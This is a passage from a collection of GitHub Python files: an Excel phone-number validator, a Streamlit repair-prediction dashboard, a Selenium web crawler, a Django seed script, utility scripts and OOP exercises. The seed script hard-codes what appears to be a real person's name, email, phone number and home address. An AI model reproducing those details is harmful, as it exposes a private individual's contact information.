phonenumbers.PhoneNumberType.FIXED_LINE_OR_MOBILE:\n isValid = True\n except phonenumbers.NumberParseException:\n print(f'Error when parsing {mobileNo}:\\n' + traceback.format_exc() + '\\n')\n\n isValid = False\n\n if not isValid:\n print(f'Invalid: {mobileNo}\\n')\n\n rowsToDelete.append(row)\n\n if len(rowsToDelete) > 0:\n print('Deleting ' + str(len(rowsToDelete)) + ' invalid records...')\n\n # Warning: Delete would take some long time\n for rowIndex in rowsToDelete[::-1]:\n sheet.delete_rows(rowIndex)\n\n rowsCountAfterDelete = rowsCount(sheet)\n\n print(f'No of records before deletion: {rowsCountBeforeDelete}')\n print(f'No of records deleted: {len(rowsToDelete)}')\n print(f'No of records remaining: {rowsCountAfterDelete}')\n\n # Check whether deleted correctly\n if (rowsCountAfterDelete + len(rowsToDelete)) == rowsCountBeforeDelete:\n print('Updating the Excel file...')\n\n wb.save(excelFilePath)\n else:\n print('Total mismatch: [Deleted rows + Remaining records] should be equal to [Records before deletion].')\n else:\n print('All records are file.')\n\n# validateMobileNumber\n\nif __name__ == '__main__':\n excelFilePath = input('Enter the path to Excel file: ')\n\n if excelFilePath and os.path.isfile(excelFilePath):\n mobileNoColumnIndex = input('Enter the Mobile number column index (starts with 1): ')\n\n if mobileNoColumnIndex.isnumeric() and int(mobileNoColumnIndex) < 1:\n print('Invalid column index.')\n quit()\n else:\n mobileNoColumnIndex = int(mobileNoColumnIndex)\n else:\n print('Invalid file or the file does not exists.')\n quit()\n\n validateMobileNumber(excelFilePath, mobileNoColumnIndex)\n","repo_name":"team-proflujo/useful-scripts","sub_path":"excel/mobile-number-validator.py","file_name":"mobile-number-validator.py","file_ext":"py","file_size_in_byte":2871,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"75119909856","text":"import pickle\nimport pandas as pd\nimport streamlit as st\nfrom joblib import load\nimport plotly.express as px\n\nst.set_page_config(page_title=\"Dashboard change parts\",\n page_icon=\"👨‍🔧\",\n layout=\"wide\")\n\nwith open(\"model/all_columns.pickle\", \"rb\") as f:\n all_columns = pickle.load(f)\n\n\ndef anio_group(anio):\n \"\"\"\n this function calculate year range\n :param anio: int, year made\n :return: str, year range\n \"\"\"\n if anio <= 2024 and anio >= 2021:\n anio_range = \"2024 - 2021\"\n elif anio <= 2020 and anio >= 2017:\n anio_range = \"2020 - 2017\"\n elif anio <= 2016 and anio >= 2013:\n anio_range = \"2016 - 2013\"\n elif anio <= 2012 and anio >= 2009:\n anio_range = \"2012 - 2009\"\n elif anio <= 2008 and anio >= 2005:\n anio_range = \"2008 - 2005\"\n else:\n anio_range = \"2004 - atrás\"\n\n return anio_range\n\nst.markdown(\"## Modelo machine learning recambio de piezas siniestros\")\nst.markdown(\"### Estructura de archivo a subir ejemplo: \")\n\ndf_example = pd.read_csv(\"data/data.csv\", nrows=5)\ndf_example = df_example.drop(columns=[\"accion\", \"accion_modelo\"])\n\nst.dataframe(df_example)\n\nst.markdown(\"### Por favor suba sus datos en formato .csv teniendo en cuenta el ejemplo anterior:\")\nst.warning('Tener en cuenta que es un demo en la capa gratuita de AWS no soporta mas de 50 filas', icon=\"⚠️\")\ndata_user = st.file_uploader(\"Datos a analizar:\", type={\"csv\", \"txt\"})\nif data_user is not None:\n df_user = pd.read_csv(data_user)\nelse:\n df_user = None\n\nif df_user is not None:\n st.markdown(\"Primeras 20 filas de sus datos:\")\n st.dataframe(df_user.head())\n fig = px.histogram(df_user,\n x=\"marca\")\n st.markdown(f\"Usted **subió {len(df_user)} partes** de las siguientes marcas: \")\n\n fig.update_xaxes(tickangle=30)\n st.plotly_chart(fig, use_container_width=True)\n\n st.markdown(\"### Pulse Calcular para hacer las predicciones\")\n\n fit_model = st.button(\"Calcular\")\n\n if fit_model:\n with st.spinner(\"Analizando ..\"):\n df = df_user.drop(columns=[\"numero_aviso\",\n \"marca\",\n \"linea\",\n \"nombre\"])\n\n anio_range_list = list(map(anio_group, list(df[\"anio\"])))\n df[\"anio_range\"] = anio_range_list\n df = df.drop(columns=[\"anio\"])\n\n df[\"grupo\"] = df[\"grupo\"].astype(str)\n df[\"subgrupo\"] = df[\"subgrupo\"].astype(str)\n\n df_model = pd.get_dummies(df)\n\n for i in range(len(all_columns)):\n if all_columns[i] not in df_model.columns:\n df_model[all_columns[i]] = 0\n\n X = df_model.values\n\n lr_model = load('model/lr_class.joblib')\n\n action = []\n for i in range(len(X)):\n temp = lr_model.predict(X[i].reshape(1, -1))[0]\n if temp:\n temp2 = \"cambiar\"\n else:\n temp2 = \"reparar\"\n action.append(temp2)\n\n df_user[\"action\"] = action\n\n st.dataframe(df_user)\n\n st.markdown(\"### Resumen se recambios\")\n\n fig = px.histogram(df_user,\n x=\"action\")\n\n fig.update_xaxes(tickangle=30)\n st.plotly_chart(fig, use_container_width=True)\n","repo_name":"Oriojas/test_ia_incidents_cars","sub_path":"front_app.py","file_name":"front_app.py","file_ext":"py","file_size_in_byte":3430,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"35539522214","text":"#!/usr/bin/env python\n\n\"\"\"\nA Python program which takes in a starting URL and traverses all links found,\nand their links and so on, to obtain 100 unique URLs.\n\"\"\"\n\nimport os\nimport sys\nimport shutil\nfrom pathlib import Path\nfrom urllib.parse import urlparse\n\nimport tldextract\nimport numpy as np\nfrom selenium import webdriver\nfrom selenium.webdriver.firefox.options import Options\nfrom selenium.common.exceptions import TimeoutException\nfrom bs4 import BeautifulSoup, SoupStrainer\n\n\n# number of unique urls to download\nTARGET_URLS = 100\n\n# name of temp dir to store html files\nHTML_DIR = \"htmls\"\n\n\nclass SimpleWebCrawler:\n def __init__(self, url):\n self.start_url = url\n\n self.url_array = np.empty(shape=TARGET_URLS, dtype=object)\n self.urls_found = 0\n self.urls_searched = 0\n\n self.html_dir = Path(HTML_DIR).absolute()\n if os.path.exists(self.html_dir):\n shutil.rmtree(self.html_dir) # clear existing directory\n os.mkdir(self.html_dir) # create fresh directory\n\n # selenium\n driver_options = Options()\n driver_options.headless = True\n self.driver = webdriver.Firefox(options=driver_options)\n self.driver.set_page_load_timeout(20) # in seconds\n\n def search(self):\n \"\"\"\n Call this function to start the URL search process from start_url.\n\n :return: None\n \"\"\"\n self.__search_url(self.start_url, inc_searched=False)\n\n def __search_url(self, url_to_search, inc_searched=True):\n \"\"\"\n Searches the given URL for links, then recursively searches the links found\n until TARGET_URLS number of URLs have been recorded.\n\n :param url_to_search: Valid URL to scrape for links\n :param inc_searched: Whether to increment url_searched\n :return: None\n \"\"\"\n link_soup = self.__get_html_link_soup(url_to_search)\n\n if link_soup is not None:\n # find all links in the soup\n self.__find_urls(link_soup)\n\n if self.urls_found == TARGET_URLS:\n # stop search\n return\n\n # update pointer to next found url to search\n if inc_searched:\n self.urls_searched += 1\n\n if self.urls_found == self.urls_searched:\n print(\"ERROR: Ran out of links to search from\")\n return\n\n # search the next url in the list\n self.__search_url(self.url_array[self.urls_searched])\n\n def cleanup(self):\n \"\"\"\n Quits the Selenium driver.\n\n :return: None\n \"\"\"\n self.driver.quit()\n\n # ============= Helper methods =============\n\n def __get_html_fp(self, url):\n \"\"\"\n Returns a file path to store the HTML obtained from the given URL.\n\n :param url: A valid URL\n :return: Path object\n \"\"\"\n filename = f\"{tldextract.extract(url).domain}-{self.urls_searched}.html\"\n return self.html_dir / filename\n\n def __download_html(self, url, html_fp):\n \"\"\"\n Uses Selenium and Firefox to download the HTML code from the given URL,\n and writes it to html_fp.\n\n :param url: URL to download HTML from\n :param html_fp: Path to write HTML code to\n :return: 0 on success, -1 if error\n \"\"\"\n try:\n # open url\n self.driver.get(url)\n\n # render js\n outer_html = self.driver.execute_script(\n \"return document.documentElement.outerHTML;\"\n )\n\n # save html to file\n with open(html_fp, 'w') as fp:\n fp.write(outer_html)\n except TimeoutException:\n print(f\"{url} timed out\")\n return -1\n except Exception:\n print(f\"Unknown error with {url}\")\n return -1\n\n return 0\n\n def __get_html_link_soup(self, url):\n \"\"\"\n Downloads HTML from the given URL and parses it using BeautifulSoup,\n filtering it to leave only the tags.\n\n :param url: URL to parse\n :return: BeautifulSoup object\n \"\"\"\n html_fp = self.__get_html_fp(url)\n\n if self.__download_html(url, html_fp) < 0:\n # download failed\n return None\n\n with open(html_fp, 'r') as fp:\n site_content = fp.read()\n\n # create soup object\n # only keep tags\n soup = BeautifulSoup(site_content, 'html.parser', parse_only=SoupStrainer(\"a\"))\n return soup\n\n @staticmethod\n def __get_valid_urls(link_soup):\n \"\"\"\n Checks the given BeautifulSoup object for 'href' attributes containing valid URLs\n and collates the URLs into a list. link_soup is assumed to only contain tags.\n\n :param link_soup: BeautifulSoup object containing only tags\n :return: List of valid URLs\n \"\"\"\n valid_urls = []\n for link in link_soup:\n if hasattr(link, 'href'):\n try:\n url = link['href']\n if is_url(url):\n valid_urls.append(url)\n except KeyError:\n # ignore this link\n continue\n return valid_urls\n\n def __find_urls(self, link_soup):\n \"\"\"\n Obtains an array of unique links from link_soup and stores them into url_array.\n If the total number of links found exceeds TARGET_URLs, it only stores the first\n n links needed to reach the target number, in the order they were found. Updates\n urls_found accordingly.\n\n link_soup is assumed to only contain tags.\n\n :param link_soup: BeautifulSoup object containing only tags\n :return: None\n \"\"\"\n links = self.__get_valid_urls(link_soup)\n link_arr = np.array(links, dtype=object)\n\n # narrow list to unique links to be added to url_array\n link_arr = np.unique(link_arr)\n # url_array must be unique\n link_arr = np.setdiff1d(link_arr, self.url_array, assume_unique=True)\n\n links_left = TARGET_URLS - self.urls_found\n links_found = get_np_arrlen(link_arr)\n if links_found <= links_left:\n # all links can fit in url_array\n self.url_array[self.urls_found:self.urls_found + links_found] = link_arr\n self.urls_found += links_found\n else:\n # fill the rest of url_array\n rem_links = link_arr[0:links_left]\n self.url_array[self.urls_found:] = rem_links\n self.urls_found = TARGET_URLS\n\n\n# ===========================\n# Helper functions\n# ===========================\n\n\ndef is_url(cand_str):\n \"\"\"\n Returns True if cand_str is a properly-formatted URL.\n\n :param cand_str: String\n :return: Boolean\n \"\"\"\n parse_result = urlparse(cand_str)\n return parse_result.scheme != \"\" and parse_result.netloc != \"\"\n\n\ndef get_np_arrlen(arr):\n \"\"\"\n Returns the length of a 1-dimensional numpy array.\n\n :param arr: numpy array\n :return: int\n \"\"\"\n return arr.shape[0]\n\n\n# ===========================\n# Main program\n# ===========================\n\n\ndef main(url):\n # sanity check on input url\n if not is_url(url):\n print(\"Invalid url given. Please try again with a valid url.\")\n sys.exit(-1)\n\n wc = SimpleWebCrawler(url)\n wc.search()\n\n print(f\"Found {wc.urls_found} unique URLs:\")\n for i, found_url in enumerate(wc.url_array):\n print(f\"{i + 1}. {found_url}\")\n\n wc.cleanup()\n\n\nif __name__ == \"__main__\":\n if len(sys.argv) == 2:\n main(sys.argv[1])\n else:\n print(\"Incorrect number of arguments. Correct format: python3 webcrawler.py \")\n","repo_name":"avrilwongaw/simple-webcrawler","sub_path":"webcrawler.py","file_name":"webcrawler.py","file_ext":"py","file_size_in_byte":7692,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"1766066450","text":"import os\nos.environ.setdefault('DJANGO_SETTINGS_MODULE', 'generique_project.settings')\n\nimport django\ndjango.setup()\n\n\nfrom travel.models import Mission, Contact, Address\nfrom faker import Faker\nfake = Faker()\n\ndef seed():\n address = Address(city='Brooklyn', street='778 Lincoln Place', state='NY', zip=11216)\n address.save()\n\n kenneth = Contact(name='kenneth mendonca', email='mendonca.kr@Gmail.com', phone=9099640670, address=address)\n kenneth.save()\n\n for num in range(0,100):\n mission = Mission(description=fake.sentence(),\n anything_else=fake.sentence(),\n address = address,\n contact = kenneth\n )\n mission.save()\n\nif __name__ == '__main__':\n print(\"Seeding Travel database....\")\n seed()","repo_name":"mendoncakr/InternetAdventureClub","sub_path":"seeds.py","file_name":"seeds.py","file_ext":"py","file_size_in_byte":790,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"16765129896","text":"from flask import flash\nfrom flask import request\nfrom flask import url_for\nfrom flask_admin.helpers import get_form_data\nfrom markupsafe import Markup\nfrom markupsafe import escape\nfrom sqlalchemy.orm import query\nfrom wtforms import BooleanField\nfrom wtforms import Form\nfrom wtforms.fields.core import IntegerField\nfrom wtforms.form import BaseForm\nfrom wtforms.validators import Optional\nfrom wtforms_sqlalchemy.fields import QuerySelectField\n\nfrom pcapi.admin.base_configuration import BaseAdminView\nfrom pcapi.core.offerers.models import Venue\nfrom pcapi.core.providers import api\nfrom pcapi.core.providers import exceptions\nfrom pcapi.core.providers.models import AllocineVenueProvider\nfrom pcapi.core.providers.models import AllocineVenueProviderPriceRule\nfrom pcapi.core.providers.models import VenueProvider\nfrom pcapi.core.providers.repository import get_active_providers_query\nfrom pcapi.repository import repository\nfrom pcapi.workers.venue_provider_job import venue_provider_job\n\n\ndef _venue_link(view, context, model, name) -> Markup:\n url = url_for(\"venue.index_view\", id=model.venueId)\n return Markup('Lieu associé').format(escape(url))\n\n\ndef _get_venue_name_and_id(venue: Venue) -> str:\n return f\"{venue.name} (#{venue.id})\"\n\n\nclass VenueProviderView(BaseAdminView):\n can_edit = True\n can_create = False\n can_delete = False\n\n column_list = [\n \"venue.name\",\n \"venue.siret\",\n \"provider.name\",\n \"venueIdAtOfferProvider\",\n \"isActive\",\n \"isDuo\",\n \"quantity\",\n \"provider.isActive\",\n \"venue_link\",\n ]\n column_labels = {\n \"venue.id\": \"Id du lieu\",\n \"venue\": \"Lieu\",\n \"venue.name\": \"Nom du lieu\",\n \"venue.siret\": \"Siret du lieu\",\n \"provider.name\": \"Provider\",\n \"venueIdAtOfferProvider\": \"Identifiant pivot (SIRET par défaut)\",\n \"isActive\": \"Import activé\",\n \"isDuo\": \"En duo ? (Allocine seulement)\",\n \"quantity\": \"Quantité (Allocine seulement)\",\n \"provider.isActive\": \"Provider activé\",\n \"venue_link\": \"Lien\",\n }\n\n column_default_sort = (\"id\", True)\n column_searchable_list = [\"venue.name\", \"venue.siret\", \"provider.name\"]\n column_filters = [\"venue.id\", \"venue.name\", \"venue.siret\", \"provider.name\"]\n form_columns = [\"venue\", \"provider\", \"venueIdAtOfferProvider\", \"isActive\"]\n form_extra_fields = [\"allocine_is_duo\", \"allocine_quantity\", \"allocine_price\"]\n\n form_args = dict(\n provider=dict(\n get_label=\"name\",\n ),\n venue=dict(get_label=_get_venue_name_and_id, label=\"Nom du lieu\"),\n )\n\n def edit_form(self, obj=None) -> Form:\n form_class = self.get_edit_form()\n is_allocine = isinstance(obj, AllocineVenueProvider)\n\n form_class.allocine_is_duo = (\n BooleanField(\n default=obj.isDuo if is_allocine else None,\n label=\"En duo (allociné)\",\n validators=[Optional()],\n )\n if is_allocine\n else None\n )\n form_class.allocine_quantity = (\n IntegerField(\n default=obj.quantity if is_allocine else None,\n label=\"Quantité (allociné)\",\n validators=[Optional()],\n )\n if is_allocine\n else None\n )\n form_class.allocine_price = (\n IntegerField(\n default=obj.priceRules[0].price if is_allocine and obj.priceRules else None,\n label=\"Prix (allociné)\",\n validators=[Optional()],\n )\n if is_allocine\n else None\n )\n\n return form_class(get_form_data(), obj=obj)\n\n def get_query(self) -> query:\n return self._extend_query(super().get_query())\n\n def get_count_query(self) -> query:\n return self._extend_query(super().get_count_query())\n\n @property\n def column_formatters(self):\n formatters = super().column_formatters\n formatters.update(venue_link=_venue_link)\n return formatters\n\n @staticmethod\n def _extend_query(query_to_override: query) -> query:\n venue_id = request.args.get(\"id\")\n\n if venue_id:\n return query_to_override.filter(VenueProvider.venueId == venue_id)\n\n return query_to_override\n\n def scaffold_form(self) -> BaseForm:\n form_class = super().scaffold_form()\n form_class.provider = QuerySelectField(query_factory=get_active_providers_query, get_label=\"name\")\n\n return form_class\n\n def update_model(self, form: Form, model: VenueProvider) -> None: # pylint: disable=too-many-return-statements\n if form.venue.data.id != model.venue.id:\n flash(\"Le lieu ne peut pas changer\", \"error\")\n return None\n\n if model.provider.isAllocine:\n if form.provider.data.id != model.provider.id:\n flash(\"Le provider de ce lieu ne peut pas être modifié\", \"error\")\n return None\n\n if form.allocine_price.data is not None or form.allocine_price.data != \"\":\n price_rule = AllocineVenueProviderPriceRule.query.filter_by(\n allocineVenueProviderId=model.id\n ).one_or_none()\n if not price_rule:\n flash(\"Aucun PriceRule n'a été trouvé\")\n return None\n price_rule.price = form.allocine_price.data\n repository.save(price_rule)\n\n if form.allocine_quantity.data is not None or form.allocine_quantity.data != \"\":\n model.quantity = form.allocine_quantity.data\n\n if form.allocine_is_duo.data is not None or form.allocine_is_duo.data != \"\":\n model.isDuo = form.allocine_is_duo.data\n\n venue_provider_job.delay(model.id)\n return super().update_model(form, model)\n\n if form.provider.data.id == model.provider.id:\n venue_provider_job.delay(model.id)\n return super().update_model(form, model)\n\n if form.provider.data.isAllocine:\n flash(\"Le provider ne peut pas être changé pour Allociné\", \"error\")\n return None\n\n venue_provider = None\n try:\n venue_provider = api.change_venue_provider(\n model,\n form.provider.data.id,\n form.venueIdAtOfferProvider.data,\n )\n venue_provider_job.delay(venue_provider.id)\n except exceptions.VenueSiretNotRegistered as exc:\n flash(\n f\"L'identifiant pivot {exc.siret} n'est pas reconnu par {exc.provider_name}.\",\n \"error\",\n )\n except exceptions.NoSiretSpecified:\n flash(\"Le siret du lieu n'est pas défini, veuillez en définir un\", \"error\")\n except exceptions.ConnexionToProviderApiFailed:\n flash(\"Problème de connexion à l'API du provider\", \"error\")\n except exceptions.ProviderNotFound:\n flash(\"Aucun provider actif n'a été trouvé\", \"error\")\n except exceptions.ProviderWithoutApiImplementation:\n flash(\"Le provider choisi n'implémente pas notre api\", \"error\")\n except exceptions.NoAllocinePivot:\n flash(\"Aucun AllocinePivot n'est défini pour ce lieu\", \"error\")\n except exceptions.NoPriceSpecified:\n flash(\"Il est obligatoire de saisir un prix\", \"error\")\n except exceptions.VenueProviderException:\n flash(\"Le provider n'a pas pu être enregistré\", \"error\")\n\n return venue_provider\n","repo_name":"pass-culture/pass-culture-api","sub_path":"api/src/pcapi/admin/custom_views/venue_provider_view.py","file_name":"venue_provider_view.py","file_ext":"py","file_size_in_byte":7606,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"34"} +{"seq_id":"15487907095","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport os\n\n\ndef disk_usage(path):\n \"\"\"Return the number of bytes used by a file/folder and any descendents.\n \"\"\"\n total = os.path.getsize(path) # account for direct usage\n if os.path.isdir(path): # if this is a directory\n for filename in os.listdir(path): # then for each child\n childpath = os.path.join(path, filename) # compose full path to child\n total += disk_usage(childpath)\n\n print('{0:<7}'.format(total), path)\n return total\n\n\nif __name__ == '__main__':\n disk_usage('/tmp')\n","repo_name":"nixawk/hello-python3","sub_path":"os/os-disk_usage.py","file_name":"os-disk_usage.py","file_ext":"py","file_size_in_byte":634,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"34"} +{"seq_id":"72745897056","text":"import stock_plot as plot\nimport stock_profile as sp\n\n\ndef lambda_function(event, context):\n interval = event['interval']\n columns = int(event['columns'])\n stocks = []\n for rec in event['data']:\n stocks.append(sp.StockProfile(rec['name'], rec['cost'], rec['total'],\n interval=interval))\n stock_output = plot.get(stocks, columns=columns)\n return {\n 'StatusCode': 200,\n 'ContentType': 'text/html',\n 'Content': stock_output\n }\n\n\nif __name__ == \"__main__\":\n lambda_function(\"\", \"\")\n","repo_name":"DeadlyChambers/my-stock","sub_path":"lambda_function.py","file_name":"lambda_function.py","file_ext":"py","file_size_in_byte":567,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"20254057203","text":"#! /usr/bin/env python\n\n#\n# William Shanks Bot\n#\n# See https://youtu.be/DmfxIhmGPP4\n#\n# Useful for finding the length of the repeating digits for\n# the inverse of a prime number.\n#\n# As an example:\n#\n# $ for num in 60013 60017 60029 60037 60041; do ./inverse.py $num; done\n# 5001\n# 60016\n# 60028\n# 10006\n# 7505\n#\n# Worst case is that this runs O(N) times where N is the prime being used.\n#\n\nimport sys\n\n\n# Generator returns both the modulus and floor division of the number\n# starting with the inverse of the number\ndef decimals(number):\n dividend = 1\n while dividend:\n yield dividend, dividend // number\n dividend = dividend % number * 10\n\n\ndef main():\n num = sys.argv[1]\n # Fast lookup of dividends\n table = {}\n # Count the number of decimal places\n inverse = []\n\n gen = decimals(int(num))\n for dividend, val in gen:\n if dividend in table and dividend > 0:\n break\n inverse.append(val)\n table[dividend] = True\n # Print the entire decimal up to the repeat point\n # print(\n # \"{}.{}\".format(\n # str(inverse[0]),\n # \"\".join(map(str, inverse[1:])),\n # )\n # )\n # subtract 1 for the zero (0) preceding the decimal place\n print(len(inverse[1:]))\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"chrisgilmerproj/silliness","sub_path":"shanksbot/shanksbot.py","file_name":"shanksbot.py","file_ext":"py","file_size_in_byte":1303,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"34"} +{"seq_id":"31217999550","text":"# 1.\r\n# class Laptop:\r\n# \"\"\"\r\n# Make the class with composition.\r\n# \"\"\"\r\n# class Battery:\r\n# \"\"\"\r\n# Make the class with composition.\r\n# \"\"\"\r\nimport dataclasses\r\nimport collections\r\n\r\n\r\nclass Laptop:\r\n def __init__(self):\r\n self.battery = Battery(2600)\r\n\r\n def __str__(self):\r\n return f'laptop object - {self.__repr__()}'\r\n\r\n\r\nclass Battery:\r\n def __init__(self, capacity: int):\r\n \"\"\"\r\n\r\n :param capacity: mAh\r\n \"\"\"\r\n self.capacity = capacity\r\n\r\n def __str__(self):\r\n return f'battery object - {self.__repr__()}'\r\n\r\n\r\nlaptop_instance_0 = Laptop()\r\nprint(laptop_instance_0, laptop_instance_0.battery, sep='\\n')\r\ndel laptop_instance_0\r\nprint('laptop_instance_0 deleted')\r\n\r\ntry:\r\n print(laptop_instance_0)\r\nexcept NameError:\r\n print('laptop_instance_0 isn\\'t exist')\r\n\r\ntry:\r\n print(laptop_instance_0.battery)\r\nexcept NameError:\r\n print('laptop_instance_0.battery isn\\'t exist')\r\n\r\n\r\n# 2.\r\n# class Guitar:\r\n# \"\"\"\r\n# Make the class with aggregation\r\n# \"\"\"\r\n# class GuitarString:\r\n# \"\"\"\r\n# Make the class with aggregation\r\n# \"\"\"\r\nclass GuitarString:\r\n def __init__(self):\r\n pass\r\n\r\n def __str__(self):\r\n return f'guitar_string object - {self.__repr__()}'\r\n\r\n\r\nclass Guitar:\r\n def __init__(self, guitar_string: GuitarString):\r\n self.guitar_string = guitar_string\r\n\r\n def __str__(self):\r\n return f'guitar object - {self.__repr__()}'\r\n\r\n\r\nguitar_string_instance_0 = GuitarString()\r\nguitar_instance_0 = Guitar(guitar_string_instance_0)\r\nprint(guitar_instance_0, guitar_string_instance_0, sep='\\n')\r\n\r\ndel guitar_instance_0\r\n\r\ntry:\r\n print(guitar_instance_0)\r\nexcept NameError:\r\n print('guitar_instance_0 isn\\'t exist')\r\n\r\ntry:\r\n print(guitar_string_instance_0)\r\nexcept NameError:\r\n print('guitar_string_instance_0 isn\\'t exist')\r\n\r\n\r\n# 3\r\n# class Calc:\r\n# \"\"\"\r\n# Make class with one method \"add_nums\" with 3 parameters, which returns sum of these parameters.\r\n# Note: this method should not take instance as first parameter.\r\n# \"\"\"\r\nclass Calc:\r\n\r\n @staticmethod\r\n def add_nums(first_arg, second_arg, third_arg):\r\n return sum((first_arg, second_arg, third_arg))\r\n\r\n\r\nprint(f'sum of {1, 5, 7} - {Calc.add_nums(1, 5, 7)}')\r\n\r\n\r\n# 4*.\r\n# class Pasta:\r\n# \"\"\"\r\n# Make class which takes 1 parameter on init - list of ingredients and defines instance attribute ingredients.\r\n# It should have 2 methods:\r\n# carbonara (['forcemeat', 'tomatoes']) and bolognaise (['bacon', 'parmesan', 'eggs'])\r\n# which should create Pasta instances with predefined list of ingredients.\r\n# Example:\r\n# pasta_1 = Pasta([\"tomato\", \"cucumber\"])\r\n# pasta_1.ingredients will equal to [\"tomato\", \"cucumber\"]\r\n# pasta_2 = Pasta.bolognaise()\r\n# pasta_2.ingredients will equal to ['bacon', 'parmesan', 'eggs']\r\n# \"\"\"\r\nclass Pasta:\r\n def __init__(self, ingredients: list):\r\n self.ingredients = ingredients\r\n\r\n @classmethod\r\n def carbonara(cls):\r\n \"\"\"\r\n create Pasta object with ingredients from list - ['forcemeat', 'tomatoes']\r\n :return: Pasta object\r\n \"\"\"\r\n return Pasta(['forcemeat', 'tomatoes'])\r\n\r\n @classmethod\r\n def bolognaise(cls):\r\n \"\"\"\r\n create Pasta object with ingredients from list - ['bacon', 'parmesan', 'eggs']\r\n :return: Pasta object\r\n \"\"\"\r\n return Pasta(['bacon', 'parmesan', 'eggs'])\r\n\r\n\r\npasta_1 = Pasta([\"tomato\", \"cucumber\"])\r\nprint(f'ingredients of pasta_1 - {pasta_1.ingredients}') # will equal to [\"tomato\", \"cucumber\"]\r\npasta_2 = Pasta.bolognaise()\r\nprint(f'ingredients of pasta_2 - {pasta_2.ingredients}') # will equal to ['bacon', 'parmesan', 'eggs']\r\n\r\n\r\n# 5*.\r\n# class Concert:\r\n# \"\"\"\r\n# Make class, which has max_visitors_num attribute and its instances will have visitors_count attribute.\r\n# In case of setting visitors_count - max_visitors_num should be checked,\r\n# if visitors_count value is bigger than max_visitors_num - visitors_count should be assigned with max_visitors_num.\r\n# Example:\r\n# Concert.max_visitor_num = 50\r\n# concert = Concert()\r\n# concert.visitors_count = 1000\r\n# print(concert.visitors_count) # 50\r\n# \"\"\"\r\nclass Concert:\r\n max_visitors_num = 0\r\n\r\n def __init__(self):\r\n self._visitors_count = 0\r\n\r\n def set_visitors_count(self, visitors_count):\r\n self._visitors_count = visitors_count if visitors_count < self.max_visitors_num else self.max_visitors_num\r\n\r\n def get_visitors_count(self):\r\n return self._visitors_count\r\n\r\n visitors_count = property(fget=get_visitors_count, fset=set_visitors_count)\r\n\r\n\r\nConcert.max_visitors_num = 50\r\nconcert = Concert()\r\nconcert.visitors_count = 1000\r\nprint(f'concert visitors - {concert.visitors_count}') # 50\r\n\r\n\r\n# 6.\r\n# class AddressBookDataClass:\r\n# \"\"\"\r\n# Create dataclass with 7 fields - key (int), name (str), phone_number (str), address (str), email (str),\r\n# birthday (str), age (int)\r\n# \"\"\"\r\n@dataclasses.dataclass()\r\nclass AddressBookDataClass:\r\n key: int\r\n name: str\r\n phone_number: str\r\n address: str\r\n email: str\r\n birthday: str\r\n age: int\r\n\r\n\r\naddress_book_instance_0 = AddressBookDataClass(key=0, name='Pasha', phone_number='354', address='Lviv',\r\n email='Pasha@354.com', birthday='1997-08-01', age=23)\r\n\r\n# 7. Create the same class (6) but using NamedTuple\r\nAddressBookDataClass_ = collections.namedtuple('AddressBookDataClass', ['key', 'name', 'phone_number', 'address',\r\n 'email', 'birthday', 'age'])\r\n\r\naddress_book_instance_1 = AddressBookDataClass_(key=1, name='Pasha', phone_number='354', address='Lviv',\r\n email='Pasha@354.com', birthday='1997-08-01', age=23)\r\n\r\nprint(f'address_book_instance_0 (dataclass) - {address_book_instance_0}')\r\nprint(f'address_book_instance_1 (namedtuple) - {address_book_instance_1}')\r\n\r\n\r\n# 8.\r\n# class AddressBook:\r\n# \"\"\"\r\n# Create regular class taking 7 params on init - key, name, phone_number, address, email, birthday, age\r\n# Make its str() representation the same as for AddressBookDataClass defined above.\r\n# \"\"\"\r\nclass AddressBook:\r\n def __init__(self, key, name, phone_number, address, email, birthday, age):\r\n self.key = key\r\n self.name = name\r\n self.phone_number = phone_number\r\n self.address = address\r\n self.email = email\r\n self.birthday = birthday\r\n self.age = age\r\n\r\n def __str__(self):\r\n return f'AddressBookDataClass(key={self.key}, name={self.name}, phone_number={self.phone_number}, ' \\\r\n f'address={self.address}, email={self.email}, birthday={self.birthday}, age={self.age})'\r\n\r\n\r\naddress_book_instance_2 = AddressBook(key=2, name='Pasha', phone_number='354', address='Lviv',\r\n email='Pasha@354.com', birthday='1997-08-01', age=23)\r\n\r\nprint(f'address_book_instance_2 (regular class) - {address_book_instance_2}')\r\n\r\n\r\n# 9.\r\n# class Person:\r\n# \"\"\"\r\n# Change the value of the age property of the person object\r\n# \"\"\"\r\n# name = \"John\"\r\n# age = 36\r\n# country = \"USA\"\r\n#\r\nclass Person:\r\n name = \"John\"\r\n age = 36\r\n country = \"USA\"\r\n\r\n\r\nperson_instance_0 = Person()\r\nprint(f'person_instance_0 age before change - {person_instance_0.age}')\r\nperson_instance_0.age += 1\r\nprint(f'person_instance_0 age after change - {person_instance_0.age}')\r\n\r\n\r\n# 10.\r\n# class Student:\r\n# \"\"\"\r\n# Add an 'email' attribute of the object student and set its value\r\n# Assign the new attribute to 'student_email' variable and print it by using getattr\r\n# \"\"\"\r\n# id = 0\r\n# name = \"\"\r\n#\r\n# def __init__(self, id, name):\r\n# self.id = id\r\n# self.name = name\r\nclass Student:\r\n student_id = 0\r\n name = ''\r\n\r\n def __init__(self, student_id, name):\r\n self.student_id = student_id\r\n self.name = name\r\n\r\n\r\nstudent_instance_0 = Student(1234, 'Pasha')\r\nsetattr(student_instance_0, 'email', f'{student_instance_0.name}{student_instance_0.student_id}' + '@university.com')\r\nprint(f'email of student {student_instance_0.name} (id - {student_instance_0.student_id}) - '\r\n f'{getattr(student_instance_0, \"email\")}')\r\n\r\n\r\n# 11*.\r\n# class Celsius:\r\n# \"\"\"\r\n# By using @property convert the celsius to fahrenheit\r\n# Hint: (temperature * 1.8) + 